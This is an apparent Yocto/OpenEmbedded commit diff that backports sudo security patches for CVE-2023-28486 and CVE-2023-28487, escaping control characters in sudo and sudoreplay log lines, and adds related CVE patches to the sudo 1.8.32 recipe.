34 | plugins/sudoers/sudoreplay.c | 44 +++++++++---- | ||
35 | 10 files changed, 257 insertions(+), 132 deletions(-) | ||
36 | |||
37 | --- a/doc/sudoers.man.in | ||
38 | +++ b/doc/sudoers.man.in | ||
39 | @@ -4566,6 +4566,19 @@ can log events using either | ||
40 | syslog(3) | ||
41 | or a simple log file. | ||
42 | The log format is almost identical in both cases. | ||
43 | +Any control characters present in the log data are formatted in octal | ||
44 | +with a leading | ||
45 | +\(oq#\(cq | ||
46 | +character. | ||
47 | +For example, a horizontal tab is stored as | ||
48 | +\(oq#011\(cq | ||
49 | +and an embedded carriage return is stored as | ||
50 | +\(oq#015\(cq. | ||
51 | +In addition, space characters in the command path are stored as | ||
52 | +\(oq#040\(cq. | ||
53 | +Literal single quotes and backslash characters | ||
54 | +(\(oq\e\(cq) | ||
55 | +in command line arguments are escaped with a backslash. | ||
56 | .SS "Accepted command log entries" | ||
57 | Commands that sudo runs are logged using the following format (split | ||
58 | into multiple lines for readability): | ||
59 | @@ -4646,7 +4659,7 @@ A list of environment variables specifie | ||
60 | if specified. | ||
61 | .TP 14n | ||
62 | command | ||
63 | -The actual command that was executed. | ||
64 | +The actual command that was executed, including any command line arguments. | ||
65 | .PP | ||
66 | Messages are logged using the locale specified by | ||
67 | \fIsudoers_locale\fR, | ||
68 | @@ -4882,17 +4895,21 @@ with a few important differences: | ||
69 | 1.\& | ||
70 | The | ||
71 | \fIprogname\fR | ||
72 | -and | ||
73 | -\fIhostname\fR | ||
74 | -fields are not present. | ||
75 | +field is not present. | ||
76 | .TP 5n | ||
77 | 2.\& | ||
78 | -If the | ||
79 | -\fIlog_year\fR | ||
80 | -option is enabled, | ||
81 | -the date will also include the year. | ||
82 | +The | ||
83 | +\fIhostname\fR | ||
84 | +is only logged if the | ||
85 | +\fIlog_host\fR | ||
86 | +option is enabled. | ||
87 | .TP 5n | ||
88 | 3.\& | ||
89 | +The date does not include the year unless the | ||
90 | +\fIlog_year\fR | ||
91 | +option is enabled. | ||
92 | +.TP 5n | ||
93 | +4.\& | ||
94 | Lines that are longer than | ||
95 | \fIloglinelen\fR | ||
96 | characters (80 by default) are word-wrapped and continued on the | ||
97 | --- a/doc/sudoers.mdoc.in | ||
98 | +++ b/doc/sudoers.mdoc.in | ||
99 | @@ -4261,6 +4261,19 @@ can log events using either | ||
100 | .Xr syslog 3 | ||
101 | or a simple log file. | ||
102 | The log format is almost identical in both cases. | ||
103 | +Any control characters present in the log data are formatted in octal | ||
104 | +with a leading | ||
105 | +.Ql # | ||
106 | +character. | ||
107 | +For example, a horizontal tab is stored as | ||
108 | +.Ql #011 | ||
109 | +and an embedded carriage return is stored as | ||
110 | +.Ql #015 . | ||
111 | +In addition, space characters in the command path are stored as | ||
112 | +.Ql #040 . | ||
113 | +Literal single quotes and backslash characters | ||
114 | +.Pq Ql \e | ||
115 | +in command line arguments are escaped with a backslash. | ||
116 | .Ss Accepted command log entries | ||
117 | Commands that sudo runs are logged using the following format (split | ||
118 | into multiple lines for readability): | ||
119 | @@ -4328,7 +4341,7 @@ option is enabled. | ||
120 | A list of environment variables specified on the command line, | ||
121 | if specified. | ||
122 | .It command | ||
123 | -The actual command that was executed. | ||
124 | +The actual command that was executed, including any command line arguments. | ||
125 | .El | ||
126 | .Pp | ||
127 | Messages are logged using the locale specified by | ||
128 | @@ -4550,14 +4563,17 @@ with a few important differences: | ||
129 | .It | ||
130 | The | ||
131 | .Em progname | ||
132 | -and | ||
133 | +field is not present. | ||
134 | +.It | ||
135 | +The | ||
136 | .Em hostname | ||
137 | -fields are not present. | ||
138 | +is only logged if the | ||
139 | +.Em log_host | ||
140 | +option is enabled. | ||
141 | .It | ||
142 | -If the | ||
143 | +The date does not include the year unless the | ||
144 | .Em log_year | ||
145 | -option is enabled, | ||
146 | -the date will also include the year. | ||
147 | +option is enabled. | ||
148 | .It | ||
149 | Lines that are longer than | ||
150 | .Em loglinelen | ||
151 | --- a/doc/sudoreplay.man.in | ||
152 | +++ b/doc/sudoreplay.man.in | ||
153 | @@ -149,6 +149,15 @@ In this mode, | ||
154 | will list available sessions in a format similar to the | ||
155 | \fBsudo\fR | ||
156 | log file format, sorted by file name (or sequence number). | ||
157 | +Any control characters present in the log data are formated in octal | ||
158 | +with a leading | ||
159 | +\(oq#\(cq | ||
160 | +character. | ||
161 | +For example, a horizontal tab is displayed as | ||
162 | +\(oq#011\(cq | ||
163 | +and an embedded carriage return is displayed as | ||
164 | +\(oq#015\(cq. | ||
165 | +.sp | ||
166 | If a | ||
167 | \fIsearch expression\fR | ||
168 | is specified, it will be used to restrict the IDs that are displayed. | ||
169 | --- a/doc/sudoreplay.mdoc.in | ||
170 | +++ b/doc/sudoreplay.mdoc.in | ||
171 | @@ -142,6 +142,16 @@ In this mode, | ||
172 | will list available sessions in a format similar to the | ||
173 | .Nm sudo | ||
174 | log file format, sorted by file name (or sequence number). | ||
175 | +Any control characters present in the log data are formatted in octal | ||
176 | +with a leading | ||
177 | +.Ql # | ||
178 | +character. | ||
179 | +For example, a horizontal tab is displayed as | ||
180 | +.Ql #011 | ||
181 | +and an embedded carriage return is displayed as | ||
182 | +.Ql #015 . | ||
183 | +Space characters in the command name and arguments are also formatted in octal. | ||
184 | +.Pp | ||
185 | If a | ||
186 | .Ar search expression | ||
187 | is specified, it will be used to restrict the IDs that are displayed. | ||
188 | --- a/include/sudo_compat.h | ||
189 | +++ b/include/sudo_compat.h | ||
190 | @@ -79,6 +79,12 @@ | ||
191 | # endif | ||
192 | #endif | ||
193 | |||
194 | +#ifdef HAVE_FALLTHROUGH_ATTRIBUTE | ||
195 | +# define FALLTHROUGH __attribute__((__fallthrough__)) | ||
196 | +#else | ||
197 | +# define FALLTHROUGH do { } while (0) | ||
198 | +#endif | ||
199 | + | ||
200 | /* | ||
201 | * Given the pointer x to the member m of the struct s, return | ||
202 | * a pointer to the containing structure. | ||
203 | --- a/include/sudo_lbuf.h | ||
204 | +++ b/include/sudo_lbuf.h | ||
205 | @@ -36,9 +36,15 @@ struct sudo_lbuf { | ||
206 | |||
207 | typedef int (*sudo_lbuf_output_t)(const char *); | ||
208 | |||
209 | +/* Flags for sudo_lbuf_append_esc() */ | ||
210 | +#define LBUF_ESC_CNTRL 0x01 | ||
211 | +#define LBUF_ESC_BLANK 0x02 | ||
212 | +#define LBUF_ESC_QUOTE 0x04 | ||
213 | + | ||
214 | __dso_public void sudo_lbuf_init_v1(struct sudo_lbuf *lbuf, sudo_lbuf_output_t output, int indent, const char *continuation, int cols); | ||
215 | __dso_public void sudo_lbuf_destroy_v1(struct sudo_lbuf *lbuf); | ||
216 | __dso_public bool sudo_lbuf_append_v1(struct sudo_lbuf *lbuf, const char *fmt, ...) __printflike(2, 3); | ||
217 | +__dso_public bool sudo_lbuf_append_esc_v1(struct sudo_lbuf *lbuf, int flags, const char *fmt, ...) __printflike(3, 4); | ||
218 | __dso_public bool sudo_lbuf_append_quoted_v1(struct sudo_lbuf *lbuf, const char *set, const char *fmt, ...) __printflike(3, 4); | ||
219 | __dso_public void sudo_lbuf_print_v1(struct sudo_lbuf *lbuf); | ||
220 | __dso_public bool sudo_lbuf_error_v1(struct sudo_lbuf *lbuf); | ||
221 | @@ -47,6 +53,7 @@ __dso_public void sudo_lbuf_clearerr_v1( | ||
222 | #define sudo_lbuf_init(_a, _b, _c, _d, _e) sudo_lbuf_init_v1((_a), (_b), (_c), (_d), (_e)) | ||
223 | #define sudo_lbuf_destroy(_a) sudo_lbuf_destroy_v1((_a)) | ||
224 | #define sudo_lbuf_append sudo_lbuf_append_v1 | ||
225 | +#define sudo_lbuf_append_esc sudo_lbuf_append_esc_v1 | ||
226 | #define sudo_lbuf_append_quoted sudo_lbuf_append_quoted_v1 | ||
227 | #define sudo_lbuf_print(_a) sudo_lbuf_print_v1((_a)) | ||
228 | #define sudo_lbuf_error(_a) sudo_lbuf_error_v1((_a)) | ||
229 | --- a/lib/util/lbuf.c | ||
230 | +++ b/lib/util/lbuf.c | ||
231 | @@ -93,6 +93,112 @@ sudo_lbuf_expand(struct sudo_lbuf *lbuf, | ||
232 | } | ||
233 | |||
234 | /* | ||
235 | + * Escape a character in octal form (#0n) and store it as a string | ||
236 | + * in buf, which must have at least 6 bytes available. | ||
237 | + * Returns the length of buf, not counting the terminating NUL byte. | ||
238 | + */ | ||
239 | +static int | ||
240 | +escape(unsigned char ch, char *buf) | ||
241 | +{ | ||
242 | + const int len = ch < 0100 ? (ch < 010 ? 3 : 4) : 5; | ||
243 | + | ||
244 | + /* Work backwards from the least significant digit to most significant. */ | ||
245 | + switch (len) { | ||
246 | + case 5: | ||
247 | + buf[4] = (ch & 7) + '0'; | ||
248 | + ch >>= 3; | ||
249 | + FALLTHROUGH; | ||
250 | + case 4: | ||
251 | + buf[3] = (ch & 7) + '0'; | ||
252 | + ch >>= 3; | ||
253 | + FALLTHROUGH; | ||
254 | + case 3: | ||
255 | + buf[2] = (ch & 7) + '0'; | ||
256 | + buf[1] = '0'; | ||
257 | + buf[0] = '#'; | ||
258 | + break; | ||
259 | + } | ||
260 | + buf[len] = '\0'; | ||
261 | + | ||
262 | + return len; | ||
263 | +} | ||
264 | + | ||
265 | +/* | ||
266 | + * Parse the format and append strings, only %s and %% escapes are supported. | ||
267 | + * Any non-printable characters are escaped in octal as #0nn. | ||
268 | + */ | ||
269 | +bool | ||
270 | +sudo_lbuf_append_esc_v1(struct sudo_lbuf *lbuf, int flags, const char *fmt, ...) | ||
271 | +{ | ||
272 | + unsigned int saved_len = lbuf->len; | ||
273 | + bool ret = false; | ||
274 | + const char *s; | ||
275 | + va_list ap; | ||
276 | + debug_decl(sudo_lbuf_append_esc, SUDO_DEBUG_UTIL); | ||
277 | + | ||
278 | + if (sudo_lbuf_error(lbuf)) | ||
279 | + debug_return_bool(false); | ||
280 | + | ||
281 | +#define should_escape(ch) \ | ||
282 | + ((ISSET(flags, LBUF_ESC_CNTRL) && iscntrl((unsigned char)ch)) || \ | ||
283 | + (ISSET(flags, LBUF_ESC_BLANK) && isblank((unsigned char)ch))) | ||
284 | +#define should_quote(ch) \ | ||
285 | + (ISSET(flags, LBUF_ESC_QUOTE) && (ch == '\'' || ch == '\\')) | ||
286 | + | ||
287 | + va_start(ap, fmt); | ||
288 | + while (*fmt != '\0') { | ||
289 | + if (fmt[0] == '%' && fmt[1] == 's') { | ||
290 | + if ((s = va_arg(ap, char *)) == NULL) | ||
291 | + s = "(NULL)"; | ||
292 | + while (*s != '\0') { | ||
293 | + if (should_escape(*s)) { | ||
294 | + if (!sudo_lbuf_expand(lbuf, sizeof("#0177") - 1)) | ||
295 | + goto done; | ||
296 | + lbuf->len += escape(*s++, lbuf->buf + lbuf->len); | ||
297 | + continue; | ||
298 | + } | ||
299 | + if (should_quote(*s)) { | ||
300 | + if (!sudo_lbuf_expand(lbuf, 2)) | ||
301 | + goto done; | ||
302 | + lbuf->buf[lbuf->len++] = '\\'; | ||
303 | + lbuf->buf[lbuf->len++] = *s++; | ||
304 | + continue; | ||
305 | + } | ||
306 | + if (!sudo_lbuf_expand(lbuf, 1)) | ||
307 | + goto done; | ||
308 | + lbuf->buf[lbuf->len++] = *s++; | ||
309 | + } | ||
310 | + fmt += 2; | ||
311 | + continue; | ||
312 | + } | ||
313 | + if (should_escape(*fmt)) { | ||
314 | + if (!sudo_lbuf_expand(lbuf, sizeof("#0177") - 1)) | ||
315 | + goto done; | ||
316 | + if (*fmt == '\'') { | ||
317 | + lbuf->buf[lbuf->len++] = '\\'; | ||
318 | + lbuf->buf[lbuf->len++] = *fmt++; | ||
319 | + } else { | ||
320 | + lbuf->len += escape(*fmt++, lbuf->buf + lbuf->len); | ||
321 | + } | ||
322 | + continue; | ||
323 | + } | ||
324 | + if (!sudo_lbuf_expand(lbuf, 1)) | ||
325 | + goto done; | ||
326 | + lbuf->buf[lbuf->len++] = *fmt++; | ||
327 | + } | ||
328 | + ret = true; | ||
329 | + | ||
330 | +done: | ||
331 | + if (!ret) | ||
332 | + lbuf->len = saved_len; | ||
333 | + if (lbuf->size != 0) | ||
334 | + lbuf->buf[lbuf->len] = '\0'; | ||
335 | + va_end(ap); | ||
336 | + | ||
337 | + debug_return_bool(ret); | ||
338 | +} | ||
339 | + | ||
340 | +/* | ||
341 | * Parse the format and append strings, only %s and %% escapes are supported. | ||
342 | * Any characters in set are quoted with a backslash. | ||
343 | */ | ||
344 | --- a/lib/util/util.exp.in | ||
345 | +++ b/lib/util/util.exp.in | ||
346 | @@ -79,6 +79,7 @@ sudo_gethostname_v1 | ||
347 | sudo_gettime_awake_v1 | ||
348 | sudo_gettime_mono_v1 | ||
349 | sudo_gettime_real_v1 | ||
350 | +sudo_lbuf_append_esc_v1 | ||
351 | sudo_lbuf_append_quoted_v1 | ||
352 | sudo_lbuf_append_v1 | ||
353 | sudo_lbuf_clearerr_v1 | ||
354 | --- a/plugins/sudoers/logging.c | ||
355 | +++ b/plugins/sudoers/logging.c | ||
356 | @@ -58,6 +58,7 @@ | ||
357 | #include <syslog.h> | ||
358 | |||
359 | #include "sudoers.h" | ||
360 | +#include "sudo_lbuf.h" | ||
361 | |||
362 | #ifndef HAVE_GETADDRINFO | ||
363 | # include "compat/getaddrinfo.h" | ||
364 | @@ -940,14 +941,6 @@ should_mail(int status) | ||
365 | (def_mail_no_perms && !ISSET(status, VALIDATE_SUCCESS))); | ||
366 | } | ||
367 | |||
368 | -#define LL_TTY_STR "TTY=" | ||
369 | -#define LL_CWD_STR "PWD=" /* XXX - should be CWD= */ | ||
370 | -#define LL_USER_STR "USER=" | ||
371 | -#define LL_GROUP_STR "GROUP=" | ||
372 | -#define LL_ENV_STR "ENV=" | ||
373 | -#define LL_CMND_STR "COMMAND=" | ||
374 | -#define LL_TSID_STR "TSID=" | ||
375 | - | ||
376 | #define IS_SESSID(s) ( \ | ||
377 | isalnum((unsigned char)(s)[0]) && isalnum((unsigned char)(s)[1]) && \ | ||
378 | (s)[2] == '/' && \ | ||
379 | @@ -962,14 +955,16 @@ should_mail(int status) | ||
380 | static char * | ||
381 | new_logline(const char *message, const char *errstr) | ||
382 | { | ||
383 | - char *line = NULL, *evstr = NULL; | ||
384 | #ifndef SUDOERS_NO_SEQ | ||
385 | char sessid[7]; | ||
386 | #endif | ||
387 | const char *tsid = NULL; | ||
388 | - size_t len = 0; | ||
389 | + struct sudo_lbuf lbuf; | ||
390 | + int i; | ||
391 | debug_decl(new_logline, SUDOERS_DEBUG_LOGGING) | ||
392 | |||
393 | + sudo_lbuf_init(&lbuf, NULL, 0, NULL, 0); | ||
394 | + | ||
395 | #ifndef SUDOERS_NO_SEQ | ||
396 | /* A TSID may be a sudoers-style session ID or a free-form string. */ | ||
397 | if (sudo_user.iolog_file != NULL) { | ||
398 | @@ -989,119 +984,55 @@ new_logline(const char *message, const c | ||
399 | #endif | ||
400 | |||
401 | /* | ||
402 | - * Compute line length | ||
403 | + * Format the log line as an lbuf, escaping control characters in | ||
404 | + * octal form (#0nn). Error checking (ENOMEM) is done at the end. | ||
405 | */ | ||
406 | - if (message != NULL) | ||
407 | - len += strlen(message) + 3; | ||
408 | - if (errstr != NULL) | ||
409 | - len += strlen(errstr) + 3; | ||
410 | - len += sizeof(LL_TTY_STR) + 2 + strlen(user_tty); | ||
411 | - len += sizeof(LL_CWD_STR) + 2 + strlen(user_cwd); | ||
412 | - if (runas_pw != NULL) | ||
413 | - len += sizeof(LL_USER_STR) + 2 + strlen(runas_pw->pw_name); | ||
414 | - if (runas_gr != NULL) | ||
415 | - len += sizeof(LL_GROUP_STR) + 2 + strlen(runas_gr->gr_name); | ||
416 | - if (tsid != NULL) | ||
417 | - len += sizeof(LL_TSID_STR) + 2 + strlen(tsid); | ||
418 | - if (sudo_user.env_vars != NULL) { | ||
419 | - size_t evlen = 0; | ||
420 | - char * const *ep; | ||
421 | - | ||
422 | - for (ep = sudo_user.env_vars; *ep != NULL; ep++) | ||
423 | - evlen += strlen(*ep) + 1; | ||
424 | - if (evlen != 0) { | ||
425 | - if ((evstr = malloc(evlen)) == NULL) | ||
426 | - goto oom; | ||
427 | - evstr[0] = '\0'; | ||
428 | - for (ep = sudo_user.env_vars; *ep != NULL; ep++) { | ||
429 | - strlcat(evstr, *ep, evlen); | ||
430 | - strlcat(evstr, " ", evlen); /* NOTE: last one will fail */ | ||
431 | - } | ||
432 | - len += sizeof(LL_ENV_STR) + 2 + evlen; | ||
433 | - } | ||
434 | - } | ||
435 | - if (user_cmnd != NULL) { | ||
436 | - /* Note: we log "sudo -l command arg ..." as "list command arg ..." */ | ||
437 | - len += sizeof(LL_CMND_STR) - 1 + strlen(user_cmnd); | ||
438 | - if (ISSET(sudo_mode, MODE_CHECK)) | ||
439 | - len += sizeof("list ") - 1; | ||
440 | - if (user_args != NULL) | ||
441 | - len += strlen(user_args) + 1; | ||
442 | - } | ||
443 | - | ||
444 | - /* | ||
445 | - * Allocate and build up the line. | ||
446 | - */ | ||
447 | - if ((line = malloc(++len)) == NULL) | ||
448 | - goto oom; | ||
449 | - line[0] = '\0'; | ||
450 | |||
451 | if (message != NULL) { | ||
452 | - if (strlcat(line, message, len) >= len || | ||
453 | - strlcat(line, errstr ? " : " : " ; ", len) >= len) | ||
454 | - goto toobig; | ||
455 | + sudo_lbuf_append_esc(&lbuf, LBUF_ESC_CNTRL, "%s%s", message, | ||
456 | + errstr ? " : " : " ; "); | ||
457 | } | ||
458 | if (errstr != NULL) { | ||
459 | - if (strlcat(line, errstr, len) >= len || | ||
460 | - strlcat(line, " ; ", len) >= len) | ||
461 | - goto toobig; | ||
462 | - } | ||
463 | - if (strlcat(line, LL_TTY_STR, len) >= len || | ||
464 | - strlcat(line, user_tty, len) >= len || | ||
465 | - strlcat(line, " ; ", len) >= len) | ||
466 | - goto toobig; | ||
467 | - if (strlcat(line, LL_CWD_STR, len) >= len || | ||
468 | - strlcat(line, user_cwd, len) >= len || | ||
469 | - strlcat(line, " ; ", len) >= len) | ||
470 | - goto toobig; | ||
471 | + sudo_lbuf_append_esc(&lbuf, LBUF_ESC_CNTRL, "%s ; ", errstr); | ||
472 | + } | ||
473 | + if (user_tty != NULL) { | ||
474 | + sudo_lbuf_append_esc(&lbuf, LBUF_ESC_CNTRL, "TTY=%s ; ", user_tty); | ||
475 | + } | ||
476 | + if (user_cwd != NULL) { | ||
477 | + sudo_lbuf_append_esc(&lbuf, LBUF_ESC_CNTRL, "PWD=%s ; ", user_cwd); | ||
478 | + } | ||
479 | if (runas_pw != NULL) { | ||
480 | - if (strlcat(line, LL_USER_STR, len) >= len || | ||
481 | - strlcat(line, runas_pw->pw_name, len) >= len || | ||
482 | - strlcat(line, " ; ", len) >= len) | ||
483 | - goto toobig; | ||
484 | + sudo_lbuf_append_esc(&lbuf, LBUF_ESC_CNTRL, "USER=%s ; ", | ||
485 | + runas_pw->pw_name); | ||
486 | } | ||
487 | if (runas_gr != NULL) { | ||
488 | - if (strlcat(line, LL_GROUP_STR, len) >= len || | ||
489 | - strlcat(line, runas_gr->gr_name, len) >= len || | ||
490 | - strlcat(line, " ; ", len) >= len) | ||
491 | - goto toobig; | ||
492 | + sudo_lbuf_append_esc(&lbuf, LBUF_ESC_CNTRL, "GROUP=%s ; ", | ||
493 | + runas_gr->gr_name); | ||
494 | } | ||
495 | if (tsid != NULL) { | ||
496 | - if (strlcat(line, LL_TSID_STR, len) >= len || | ||
497 | - strlcat(line, tsid, len) >= len || | ||
498 | - strlcat(line, " ; ", len) >= len) | ||
499 | - goto toobig; | ||
500 | - } | ||
501 | - if (evstr != NULL) { | ||
502 | - if (strlcat(line, LL_ENV_STR, len) >= len || | ||
503 | - strlcat(line, evstr, len) >= len || | ||
504 | - strlcat(line, " ; ", len) >= len) | ||
505 | - goto toobig; | ||
506 | - free(evstr); | ||
507 | - evstr = NULL; | ||
508 | + sudo_lbuf_append_esc(&lbuf, LBUF_ESC_CNTRL, "TSID=%s ; ", tsid); | ||
509 | + } | ||
510 | + if (sudo_user.env_vars != NULL) { | ||
511 | + sudo_lbuf_append_esc(&lbuf, LBUF_ESC_CNTRL, "ENV=%s", sudo_user.env_vars[0]); | ||
512 | + for (i = 1; sudo_user.env_vars[i] != NULL; i++) { | ||
513 | + sudo_lbuf_append_esc(&lbuf, LBUF_ESC_CNTRL, " %s", | ||
514 | + sudo_user.env_vars[i]); | ||
515 | + } | ||
516 | } | ||
517 | if (user_cmnd != NULL) { | ||
518 | - if (strlcat(line, LL_CMND_STR, len) >= len) | ||
519 | - goto toobig; | ||
520 | - if (ISSET(sudo_mode, MODE_CHECK) && strlcat(line, "list ", len) >= len) | ||
521 | - goto toobig; | ||
522 | - if (strlcat(line, user_cmnd, len) >= len) | ||
523 | - goto toobig; | ||
524 | + sudo_lbuf_append_esc(&lbuf, LBUF_ESC_CNTRL|LBUF_ESC_BLANK, | ||
525 | + "COMMAND=%s", user_cmnd); | ||
526 | if (user_args != NULL) { | ||
527 | - if (strlcat(line, " ", len) >= len || | ||
528 | - strlcat(line, user_args, len) >= len) | ||
529 | - goto toobig; | ||
530 | + sudo_lbuf_append_esc(&lbuf, | ||
531 | + LBUF_ESC_CNTRL|LBUF_ESC_QUOTE, | ||
532 | + " %s", user_args); | ||
533 | } | ||
534 | } | ||
535 | |||
536 | - debug_return_str(line); | ||
537 | -oom: | ||
538 | - free(evstr); | ||
539 | + if (!sudo_lbuf_error(&lbuf)) | ||
540 | + debug_return_str(lbuf.buf); | ||
541 | + | ||
542 | + sudo_lbuf_destroy(&lbuf); | ||
543 | sudo_warnx(U_("%s: %s"), __func__, U_("unable to allocate memory")); | ||
544 | debug_return_str(NULL); | ||
545 | -toobig: | ||
546 | - free(evstr); | ||
547 | - free(line); | ||
548 | - sudo_warnx(U_("internal error, %s overflow"), __func__); | ||
549 | - debug_return_str(NULL); | ||
550 | } | ||
551 | --- a/plugins/sudoers/sudoreplay.c | ||
552 | +++ b/plugins/sudoers/sudoreplay.c | ||
553 | @@ -71,6 +71,7 @@ | ||
554 | #include "sudo_conf.h" | ||
555 | #include "sudo_debug.h" | ||
556 | #include "sudo_event.h" | ||
557 | +#include "sudo_lbuf.h" | ||
558 | #include "sudo_util.h" | ||
559 | |||
560 | #ifdef HAVE_GETOPT_LONG | ||
561 | @@ -1353,7 +1354,8 @@ match_expr(struct search_node_list *head | ||
562 | } | ||
563 | |||
564 | static int | ||
565 | -list_session(char *logfile, regex_t *re, const char *user, const char *tty) | ||
566 | +list_session(struct sudo_lbuf *lbuf, char *logfile, regex_t *re, | ||
567 | + const char *user, const char *tty) | ||
568 | { | ||
569 | char idbuf[7], *idstr, *cp; | ||
570 | const char *timestr; | ||
571 | @@ -1386,16 +1388,32 @@ list_session(char *logfile, regex_t *re, | ||
572 | } | ||
573 | /* XXX - print rows + cols? */ | ||
574 | timestr = get_timestr(li->tstamp, 1); | ||
575 | - printf("%s : %s : TTY=%s ; CWD=%s ; USER=%s ; ", | ||
576 | - timestr ? timestr : "invalid date", | ||
577 | - li->user, li->tty, li->cwd, li->runas_user); | ||
578 | - if (li->runas_group) | ||
579 | - printf("GROUP=%s ; ", li->runas_group); | ||
580 | - printf("TSID=%s ; COMMAND=%s\n", idstr, li->cmd); | ||
581 | - | ||
582 | - ret = 0; | ||
583 | - | ||
584 | + sudo_lbuf_append_esc(lbuf, LBUF_ESC_CNTRL, "%s : %s : ", | ||
585 | + timestr ? timestr : "invalid date", li->user); | ||
586 | + if (li->tty != NULL) { | ||
587 | + sudo_lbuf_append_esc(lbuf, LBUF_ESC_CNTRL, "TTY=%s ; ", | ||
588 | + li->tty); | ||
589 | + } | ||
590 | + if (li->cwd != NULL) { | ||
591 | + sudo_lbuf_append_esc(lbuf, LBUF_ESC_CNTRL, "CWD=%s ; ", | ||
592 | + li->cwd); | ||
593 | + } | ||
594 | + sudo_lbuf_append_esc(lbuf, LBUF_ESC_CNTRL, "USER=%s ; ", li->runas_user); | ||
595 | + if (li->runas_group != NULL) { | ||
596 | + sudo_lbuf_append_esc(lbuf, LBUF_ESC_CNTRL, "GROUP=%s ; ", | ||
597 | + li->runas_group); | ||
598 | + } | ||
599 | + sudo_lbuf_append_esc(lbuf, LBUF_ESC_CNTRL, "TSID=%s ; ", idstr); | ||
600 | + sudo_lbuf_append_esc(lbuf, LBUF_ESC_CNTRL, "COMMAND=%s", | ||
601 | + li->cmd); | ||
602 | + | ||
603 | + if (!sudo_lbuf_error(lbuf)) { | ||
604 | + puts(lbuf->buf); | ||
605 | + ret = 0; | ||
606 | + } | ||
607 | done: | ||
608 | + lbuf->error = 0; | ||
609 | + lbuf->len = 0; | ||
610 | free_log_info(li); | ||
611 | debug_return_int(ret); | ||
612 | } | ||
613 | @@ -1415,6 +1433,7 @@ find_sessions(const char *dir, regex_t * | ||
614 | DIR *d; | ||
615 | struct dirent *dp; | ||
616 | struct stat sb; | ||
617 | + struct sudo_lbuf lbuf; | ||
618 | size_t sdlen, sessions_len = 0, sessions_size = 0; | ||
619 | unsigned int i; | ||
620 | int len; | ||
621 | @@ -1426,6 +1445,8 @@ find_sessions(const char *dir, regex_t * | ||
622 | #endif | ||
623 | debug_decl(find_sessions, SUDO_DEBUG_UTIL) | ||
624 | |||
625 | + sudo_lbuf_init(&lbuf, NULL, 0, NULL, 0); | ||
626 | + | ||
627 | d = opendir(dir); | ||
628 | if (d == NULL) | ||
629 | sudo_fatal(U_("unable to open %s"), dir); | ||
630 | @@ -1485,7 +1506,7 @@ find_sessions(const char *dir, regex_t * | ||
631 | |||
632 | /* Check for dir with a log file. */ | ||
633 | if (lstat(pathbuf, &sb) == 0 && S_ISREG(sb.st_mode)) { | ||
634 | - list_session(pathbuf, re, user, tty); | ||
635 | + list_session(&lbuf, pathbuf, re, user, tty); | ||
636 | } else { | ||
637 | /* Strip off "/log" and recurse if a dir. */ | ||
638 | pathbuf[sdlen + len - 4] = '\0'; | ||
639 | @@ -1496,6 +1517,7 @@ find_sessions(const char *dir, regex_t * | ||
640 | } | ||
641 | free(sessions); | ||
642 | } | ||
643 | + sudo_lbuf_destroy(&lbuf); | ||
644 | |||
645 | debug_return_int(0); | ||
646 | } | ||
diff --git a/meta/recipes-extended/sudo/sudo/CVE-2023-28486_CVE-2023-28487-2.patch b/meta/recipes-extended/sudo/sudo/CVE-2023-28486_CVE-2023-28487-2.patch new file mode 100644 index 0000000000..d021873b70 --- /dev/null +++ b/meta/recipes-extended/sudo/sudo/CVE-2023-28486_CVE-2023-28487-2.patch | |||
@@ -0,0 +1,26 @@ | |||
1 | Backport of: | ||
2 | |||
3 | From 12648b4e0a8cf486480442efd52f0e0b6cab6e8b Mon Sep 17 00:00:00 2001 | ||
4 | From: "Todd C. Miller" <Todd.Miller@sudo.ws> | ||
5 | Date: Mon, 13 Mar 2023 08:04:32 -0600 | ||
6 | Subject: [PATCH] Add missing " ; " separator between environment variables and | ||
7 | command. This is a regression introduced in sudo 1.9.13. GitHub issue #254. | ||
8 | |||
9 | Upstream-Status: Backport [import from ubuntu https://git.launchpad.net/ubuntu/+source/sudo/tree/debian/patches/CVE-2023-2848x-2.patch?h=ubuntu/focal-security | ||
10 | Upstream commit https://github.com/sudo-project/sudo/commit/12648b4e0a8cf486480442efd52f0e0b6cab6e8b] | ||
11 | CVE: CVE-2023-28486 CVE-2023-28487 | ||
12 | Signed-off-by: Vijay Anusuri <vanusuri@mvista.com> | ||
13 | --- | ||
14 | lib/eventlog/eventlog.c | 1 + | ||
15 | 1 file changed, 1 insertion(+) | ||
16 | |||
17 | --- a/plugins/sudoers/logging.c | ||
18 | +++ b/plugins/sudoers/logging.c | ||
19 | @@ -1018,6 +1018,7 @@ new_logline(const char *message, const c | ||
20 | sudo_lbuf_append_esc(&lbuf, LBUF_ESC_CNTRL, " %s", | ||
21 | sudo_user.env_vars[i]); | ||
22 | } | ||
23 | + sudo_lbuf_append(&lbuf, " ; "); | ||
24 | } | ||
25 | if (user_cmnd != NULL) { | ||
26 | sudo_lbuf_append_esc(&lbuf, LBUF_ESC_CNTRL|LBUF_ESC_BLANK, | ||
diff --git a/meta/recipes-extended/sudo/sudo_1.8.32.bb b/meta/recipes-extended/sudo/sudo_1.8.32.bb index 8d16ec2538..e35bbfa789 100644 --- a/meta/recipes-extended/sudo/sudo_1.8.32.bb +++ b/meta/recipes-extended/sudo/sudo_1.8.32.bb | |||
@@ -4,6 +4,10 @@ SRC_URI = "https://www.sudo.ws/dist/sudo-${PV}.tar.gz \ | |||
4 | ${@bb.utils.contains('DISTRO_FEATURES', 'pam', '${PAM_SRC_URI}', '', d)} \ | 4 | ${@bb.utils.contains('DISTRO_FEATURES', 'pam', '${PAM_SRC_URI}', '', d)} \ |
5 | file://0001-Include-sys-types.h-for-id_t-definition.patch \ | 5 | file://0001-Include-sys-types.h-for-id_t-definition.patch \ |
6 | file://0001-Fix-includes-when-building-with-musl.patch \ | 6 | file://0001-Fix-includes-when-building-with-musl.patch \ |
7 | file://CVE-2022-43995.patch \ | ||
8 | file://CVE-2023-22809.patch \ | ||
9 | file://CVE-2023-28486_CVE-2023-28487-1.patch \ | ||
10 | file://CVE-2023-28486_CVE-2023-28487-2.patch \ | ||
7 | " | 11 | " |
8 | 12 | ||
9 | PAM_SRC_URI = "file://sudo.pam" | 13 | PAM_SRC_URI = "file://sudo.pam" |
diff --git a/meta/recipes-extended/sysklogd/sysklogd.inc b/meta/recipes-extended/sysklogd/sysklogd.inc index 8899daa1b0..e45b256bbe 100644 --- a/meta/recipes-extended/sysklogd/sysklogd.inc +++ b/meta/recipes-extended/sysklogd/sysklogd.inc | |||
@@ -10,7 +10,7 @@ LIC_FILES_CHKSUM = "file://LICENSE;md5=5b4be4b2549338526758ef479c040943 \ | |||
